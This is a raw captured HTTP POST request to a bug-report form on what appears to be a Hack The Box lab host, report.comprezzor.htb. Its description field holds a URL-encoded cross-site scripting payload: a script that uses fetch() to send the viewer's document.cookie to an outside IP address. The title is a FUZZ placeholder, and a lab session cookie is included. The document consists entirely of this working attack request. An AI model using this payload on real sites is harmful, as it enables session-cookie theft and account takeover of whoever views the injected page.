POST /report_bug HTTP/1.1
Host: report.comprezzor.htb
Content-Length: 192
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://report.comprezzor.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://report.comprezzor.htb/report_bug
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: user_data=eyJ1c2VyX2lkIjogNiwgInVzZXJuYW1lIjogImFzZCIsICJyb2xlIjogInVzZXIifXxhMTJmZjZlMTRkMzdjNmU1NjcwYWYzY2Q5MTVjY2ZhNWIwZTVjN2JjMTIzOTM1NTZjMWYwNzk2NDNlMWVlMzg2
Connection: close

report_title=FUZZ&description=%3Cscript%3E+fetch%28%27http%3A%2F%2F10.10.14.29%3A%27%2C+%7B+method%3A+%27POST%27%2C+mode%3A+%27no-cors%27%2C+body%3Adocument.cookie+%7D%29%3B+%3C%2Fscript%3E
